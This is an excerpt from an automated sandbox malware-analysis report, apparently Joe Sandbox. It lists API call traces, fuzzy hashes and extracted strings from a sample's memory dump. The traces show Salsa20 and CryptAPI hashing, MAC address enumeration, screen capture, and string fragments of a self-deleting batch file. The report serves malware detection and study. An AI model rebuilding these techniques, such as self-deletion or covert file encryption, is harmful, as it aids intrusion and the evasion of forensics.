                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Exception@8HashThrow$ContextParam_memset$AcquireCreateDataDestroyExceptionRaiseRelease_malloc_sprintflstrcatlstrlen
                                • String ID: %.2X
                                • API String ID: 2451520719-213608013
                                • Opcode ID: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                • Instruction ID: afcee35d8fffc0279d29cc69f214b0122642615a52b78f57353c1cfd92a6c2ef
                                • Opcode Fuzzy Hash: 6f04bcb1d5af6720d81330ba6d25d2fff10d0e34b425382de5d36dfe67944e00
                                • Instruction Fuzzy Hash: 92516171E40219BBDB10DBE5DC46FEFBBB8FB08704F14012AFA05B6291D77959018BA9
                                APIs
                                • GetLastError.KERNEL32 ref: 00411915
                                • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00411932
                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411941
                                • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411948
                                • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00411956
                                • lstrcpyW.KERNEL32(00000000,?), ref: 00411962
                                • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00411974
                                • lstrcatW.KERNEL32(00000000,?), ref: 0041198B
                                • lstrcatW.KERNEL32(00000000,00500260), ref: 00411993
                                • lstrcatW.KERNEL32(00000000,?), ref: 00411999
                                • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004119A3
                                • _memset.LIBCMT ref: 004119B8
                                • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004119DC
                                  • Part of subcall function 00412BA0: lstrlenW.KERNEL32(?), ref: 00412BC9
                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00411A01
                                • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00411A04
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                • String ID: failed with error
                                • API String ID: 4182478520-946485432
                                • Opcode ID: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                • Instruction ID: 1677776e610180b78075291f83559cfdcc99dc463041ebd32873df59a21ecb07
                                • Opcode Fuzzy Hash: 18b9b32fccc37a3c6be161fd0b5e4603234beec1f634f25e965e40264c5ea564
                                • Instruction Fuzzy Hash: 0021FB31A40214B7D7516B929C85FAE3A38EF45B11F100025FB09B61D0DE741D419BED
                                APIs
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                • PathFindFileNameW.SHLWAPI(?,?,00000000,000000FF), ref: 0040F900
                                • _memmove.LIBCMT ref: 0040F9EA
                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0040FA51
                                • _memmove.LIBCMT ref: 0040FADA
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                • String ID:
                                • API String ID: 273148273-0
                                • Opcode ID: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                • Instruction ID: a2fe25dd57492d494e78aebb36a96054b80ce25314fb01b08d1ce03a62da89f0
                                • Opcode Fuzzy Hash: 9523524d8d3b45d9081d0fccdbbe5b8ea63895c3f5938442575e5094c992c0b6
                                • Instruction Fuzzy Hash: D652A271D00208DBDF20DFA4D985BDEB7B4BF05308F10817AE419B7291D779AA89CB99
                                APIs
                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000,00000000), ref: 0040E8CE
                                • __CxxThrowException@8.LIBCMT ref: 0040E8E4
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040E8F9
                                • __CxxThrowException@8.LIBCMT ref: 0040E90F
                                • CryptHashData.ADVAPI32(00000000,00000000,?,00000000), ref: 0040E928
                                • __CxxThrowException@8.LIBCMT ref: 0040E93E
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000), ref: 0040E95D
                                • __CxxThrowException@8.LIBCMT ref: 0040E96F
                                • _memset.LIBCMT ref: 0040E98E
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040E9A2
                                • __CxxThrowException@8.LIBCMT ref: 0040E9B4
                                • _sprintf.LIBCMT ref: 0040E9D3
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CryptException@8Throw$Hash$Param$AcquireContextCreateDataExceptionRaise_memset_sprintf
                                • String ID: %.2X
                                • API String ID: 1084002244-213608013
                                • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction ID: 6020eefb82f776eec2353dc0ff897aa1862dcd4ecc30860888fbdadc8ba65bc1
                                • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                • Instruction Fuzzy Hash: 835173B1E40209EBDF11DFA2DC46FEEBB78EB04704F10452AF501B61C1D7796A158BA9
                                APIs
                                • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,004FFCA4,00000000), ref: 0040EB01
                                • __CxxThrowException@8.LIBCMT ref: 0040EB17
                                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                • CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 0040EB2C
                                • __CxxThrowException@8.LIBCMT ref: 0040EB42
                                • CryptHashData.ADVAPI32(00000000,?,?,00000000), ref: 0040EB4E
                                • __CxxThrowException@8.LIBCMT ref: 0040EB64
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,?,00000000,?,?,00000000), ref: 0040EB83
                                • __CxxThrowException@8.LIBCMT ref: 0040EB95
                                • _memset.LIBCMT ref: 0040EBB4
                                • CryptGetHashParam.ADVAPI32(00000000,00000002,00000000,00000000,00000000), ref: 0040EBC8
                                • __CxxThrowException@8.LIBCMT ref: 0040EBDA
                                • _sprintf.LIBCMT ref: 0040EBF4
                                • CryptDestroyHash.ADVAPI32(00000000), ref: 0040EC44
                                • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0040EC4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$Exception@8HashThrow$ContextParam$AcquireCreateDataDestroyExceptionRaiseRelease_memset_sprintf
                                • String ID: %.2X
                                • API String ID: 1637485200-213608013
                                • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction ID: 14d7d02cf3c54262bdef7e6fa07b3cadf7b2b7504ea62fb0b9d39e8d8664034d
                                • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                • Instruction Fuzzy Hash: A6515371E40209ABDF11DBA6DC46FEFBBB8EB04704F14052AF505B62C1D77969058BA8
                                APIs
                                  • Part of subcall function 004549A0: GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                  • Part of subcall function 004549A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                  • Part of subcall function 004549A0: GetDesktopWindow.USER32 ref: 004549FB
                                  • Part of subcall function 004549A0: GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                  • Part of subcall function 004549A0: GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                  • Part of subcall function 004549A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                  • Part of subcall function 004549A0: _wcsstr.LIBCMT ref: 00454A8A
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00482316
                                • CreateCompatibleDC.GDI32(00000000), ref: 00482323
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00482338
                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00482341
                                • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 0048234E
                                • SelectObject.GDI32(00000000,00000000), ref: 0048235C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 0048236E
                                • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004823CA
                                • GetBitmapBits.GDI32(?,?,00000000), ref: 004823D6
                                • SelectObject.GDI32(?,?), ref: 00482436
                                • DeleteObject.GDI32(00000000), ref: 0048243D
                                • DeleteDC.GDI32(?), ref: 0048244A
                                • DeleteDC.GDI32(?), ref: 00482450
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                • API String ID: 151064509-1805842116
                                • Opcode ID: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                • Instruction ID: 00d76d2b57e2ae43ffa0e146b327d2d4306243c0a97269805a4caa25bb15a565
                                • Opcode Fuzzy Hash: 1b801d1ffbd88b82039091f0604768a30c592b3e6827ab76a1e426d578563625
                                • Instruction Fuzzy Hash: 0441BB71944300EBD3105BB6DC86F6FBBF8FF85B14F00052EFA54962A1E77598008B6A
                                APIs
                                • _malloc.LIBCMT ref: 0040E67F
                                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(00670000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                • _malloc.LIBCMT ref: 0040E68B
                                • _wprintf.LIBCMT ref: 0040E69E
                                • _free.LIBCMT ref: 0040E6A4
                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6B9
                                • _free.LIBCMT ref: 0040E6C5
                                • _malloc.LIBCMT ref: 0040E6CD
                                • GetAdaptersInfo.IPHLPAPI(00000000,00000288), ref: 0040E6E0
                                • _sprintf.LIBCMT ref: 0040E720
                                • _wprintf.LIBCMT ref: 0040E732
                                • _wprintf.LIBCMT ref: 0040E73C
                                • _free.LIBCMT ref: 0040E745
                                Strings
                                • %02X:%02X:%02X:%02X:%02X:%02X, xrefs: 0040E71A
                                • Error allocating memory needed to call GetAdaptersinfo, xrefs: 0040E699
                                • Address: %s, mac: %s, xrefs: 0040E72D
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free_malloc_wprintf$AdaptersHeapInfo$AllocateErrorFreeLast_sprintf
                                • String ID: %02X:%02X:%02X:%02X:%02X:%02X$Address: %s, mac: %s$Error allocating memory needed to call GetAdaptersinfo
                                • API String ID: 3901070236-1604013687
                                • Opcode ID: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                • Instruction ID: 1f0497fb971ee708fef02f82321736b2a43cb7681c3985dbc626545fd8dc3fd8
                                • Opcode Fuzzy Hash: 3662c7b498418dd0805699ed7e156d37d96e3abec8e0c242f5b97c865e313c7a
                                • Instruction Fuzzy Hash: 251127B2A045647AC27162F76C02FFF3ADC8F45705F84056BFA98E1182EA5D5A0093B9
                                APIs
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411ACA
                                  • Part of subcall function 00411AB0: DispatchMessageW.USER32(?), ref: 00411AE0
                                  • Part of subcall function 00411AB0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00411AEE
                                • PathFindFileNameW.SHLWAPI(?,?,00000000), ref: 00410346
                                • _memmove.LIBCMT ref: 00410427
                                • PathFindFileNameW.SHLWAPI(?,?,00000000,00000000,00000000,-00000002), ref: 0041048E
                                • _memmove.LIBCMT ref: 00410514
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$FileFindNamePathPeek_memmove$Dispatch
                                • String ID:
                                • API String ID: 273148273-0
                                • Opcode ID: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                • Instruction ID: 4d52a43d2e6eeb98f1fe08e229a92f838bd03635929547cf71b8ba18611ce854
                                • Opcode Fuzzy Hash: 5579d069003674f30fc20657d67551341dfb12f417424f211cabcd1385ef9a93
                                • Instruction Fuzzy Hash: EF429F70D00208DBDF14DFA4C985BDEB7F5BF04308F20456EE415A7291E7B9AA85CBA9
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Path$AppendExistsFile_free_malloc_memmovelstrcatlstrcpy
                                • String ID:
                                • API String ID: 3232302685-0
                                • Opcode ID: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                • Opcode Fuzzy Hash: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                APIs
                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP
                                • API String ID: 2299586839-711371036
                                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                APIs
                                Strings
                                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                • input != nullptr && output != nullptr, xrefs: 0040C095
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: __wassert
                                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                • API String ID: 3993402318-1975116136
                                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                APIs
                                • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$ContextDestroyHashRelease
                                • String ID:
                                • API String ID: 3989222877-0
                                • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                                • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                                APIs
                                • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$ContextDestroyHashRelease
                                • String ID:
                                • API String ID: 3989222877-0
                                • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                                • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                                APIs
                                • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: Crypt$ContextDestroyHashRelease
                                • String ID:
                                • API String ID: 3989222877-0
                                • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                                • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                                APIs
                                • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                                • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                                • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                                • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                                APIs
                                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                • GetLastError.KERNEL32 ref: 00412509
                                • CloseHandle.KERNEL32 ref: 0041251C
                                • CloseHandle.KERNEL32 ref: 00412539
                                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                • GetLastError.KERNEL32 ref: 0041255B
                                • CloseHandle.KERNEL32 ref: 0041256E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseHandle$CreateErrorLastMutex
                                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                • API String ID: 2372642624-488272950
                                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _strncmp
                                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                • API String ID: 909875538-2733969777
                                • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                APIs
                                Memory Dump Source
                                • Source File: 00000002.00000002.2170448780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000002.00000002.2170448780.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                • Associated: 00000002.00000002.2170448780.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_tsnsd8pOvn.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                • String ID:
                                • API String ID: 1503006713-0
                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                APIs
                                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                • _malloc.LIBCMT ref: 0041BBE4
